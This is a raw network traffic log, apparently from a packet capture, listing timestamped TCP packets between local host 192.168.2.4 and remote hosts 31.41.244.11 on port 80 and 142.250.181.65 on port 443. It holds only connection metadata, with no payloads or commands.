Dec 22, 2024 02:16:53.379426956 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.379493952 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.379512072 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.379554033 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.379708052 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.379750013 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.380204916 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.380295992 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.380314112 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.380345106 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.380372047 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.380517960 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.380980968 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.381026983 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.381061077 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.381078959 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.381122112 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.381300926 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.381383896 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.381747961 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.381845951 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.381870031 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.381897926 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.381926060 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.382076025 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.382529020 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.382572889 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.382620096 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.382638931 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.382682085 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.382846117 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.382889986 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.383327007 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.383410931 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.383435011 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.383471012 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.383501053 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.383639097 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.384119987 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.384166956 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.384216070 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.384232998 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.384277105 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.384454012 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.384495974 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.384891987 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.384983063 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.384999990 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.385029078 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.385055065 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.385206938 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.385266066 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.385675907 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.385781050 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.385797977 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.385834932 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.385860920 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.385982037 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.386455059 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.386501074 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.386563063 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.386580944 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.386624098 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.386780024 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.386820078 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.387265921 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.387348890 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.387365103 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.387397051 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.387423992 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.387578964 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.388020039 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.388068914 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.388124943 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.388142109 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.388185024 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.388339996 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.388557911 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.388847113 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.388946056 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.388962984 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.388989925 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.389014959 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.389177084 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.389612913 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.389657021 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.389703035 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.389722109 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.389764071 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.389921904 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.389961958 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.390362978 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.392155886 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.415031910 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.415117025 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.415132046 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.415184975 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.415258884 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.415276051 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.415365934 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.415365934 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.415498972 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.415903091 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.415946960 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.415971041 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.415977955 CET	443	49882	142.250.181.65	192.168.2.4
Dec 22, 2024 02:16:53.416008949 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.416054010 CET	49882	443	192.168.2.4	142.250.181.65
Dec 22, 2024 02:16:53.611434937 CET	49882	443	192.168.2.4	142.250.181.65
Dec 22, 2024 02:16:53.611447096 CET	443	49882	142.250.181.65	192.168.2.4
Dec 22, 2024 02:16:53.611778975 CET	443	49882	142.250.181.65	192.168.2.4
Dec 22, 2024 02:16:53.612260103 CET	49882	443	192.168.2.4	142.250.181.65
Dec 22, 2024 02:16:53.624212027 CET	49882	443	192.168.2.4	142.250.181.65
Dec 22, 2024 02:16:53.671329021 CET	443	49882	142.250.181.65	192.168.2.4
Dec 22, 2024 02:16:53.743865967 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.743908882 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.743925095 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.743941069 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.743958950 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.743971109 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.743973970 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.743993044 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.743997097 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.744014978 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.744040966 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.744328976 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.744347095 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.744363070 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.744379044 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.744389057 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.744395018 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.744405031 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.744411945 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.744438887 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.745198965 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.745215893 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.745230913 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.745230913 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.745232105 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.745256901 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.745260954 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.745275021 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.745280027 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.745304108 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.745316029 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.745989084 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.746021032 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.746046066 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.746061087 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.746062994 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.746078014 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.746078968 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.746095896 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.746105909 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.746118069 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.746136904 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.746934891 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.746952057 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.746961117 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.746968985 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.746978045 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.746994972 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.747005939 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.747023106 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.747023106 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.747689962 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.747734070 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.747759104 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.747773886 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.747782946 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.747790098 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.747833014 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.748610020 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.748626947 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.748642921 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.748660088 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.748677015 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.748693943 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.748701096 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.748701096 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.748701096 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.748716116 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.748733044 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.749407053 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.749480963 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.749497890 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.749515057 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.749521017 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.749532938 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.749560118 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.749576092 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.749646902 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.750260115 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.750303030 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.750441074 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.750473976 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.750482082 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.750507116 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.750511885 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.750524998 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.750540972 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.750545025 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.750556946 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.750561953 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.750581026 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.750595093 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.751354933 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.751373053 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.751389980 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.751399040 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.751408100 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.751425028 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.751435041 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.751451015 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.751457930 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.752191067 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.752218008 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.752233982 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.752249002 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.752259016 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.752264977 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.752280951 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.752284050 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.752304077 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.752371073 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.753061056 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.753078938 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.753093958 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.753112078 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.753128052 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.753144026 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.753176928 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.753176928 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.753176928 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.753176928 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.753176928 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.753844023 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.753901005 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.753918886 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.753935099 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.753945112 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.753952026 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.753952980 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.753979921 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.753998041 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.754781961 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.754797935 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.754813910 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.754821062 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.754832029 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.754836082 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.754848957 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.754849911 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.754867077 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.754873037 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.754901886 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.754901886 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.755645037 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.755661964 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.755677938 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.755695105 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.755702019 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.755712986 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.755737066 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.755767107 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.756437063 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.756457090 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.756489038 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.756505013 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.756520033 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.756526947 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.756526947 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.756536961 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.756578922 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.756607056 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.757333994 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.757350922 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.757366896 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.757384062 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.757391930 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.757400990 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.757400990 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.757694960 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.757694960 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.758168936 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.758200884 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.758214951 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.758225918 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.758233070 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.758235931 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.758251905 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.758255959 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.758272886 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.758284092 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.758304119 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.758310080 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.759066105 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.759083033 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.759098053 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.759114981 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.759129047 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.759131908 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.759149075 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.759169102 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.759903908 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.759922028 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.759937048 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.759953022 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.759969950 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.759978056 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.759984970 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.759985924 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.760003090 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.760025024 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.760766983 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.760814905 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.760831118 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.760848045 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.760864019 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.760874987 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.760883093 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.760881901 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.760905981 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.760926962 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.761615992 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.761634111 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.761646986 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.761662006 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.761682034 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.761698008 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.761728048 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.761728048 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.762506962 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.762523890 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.762538910 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.762566090 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.762567043 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.762584925 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.762588978 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.762602091 CET	80	49872	31.41.244.11	192.168.2.4
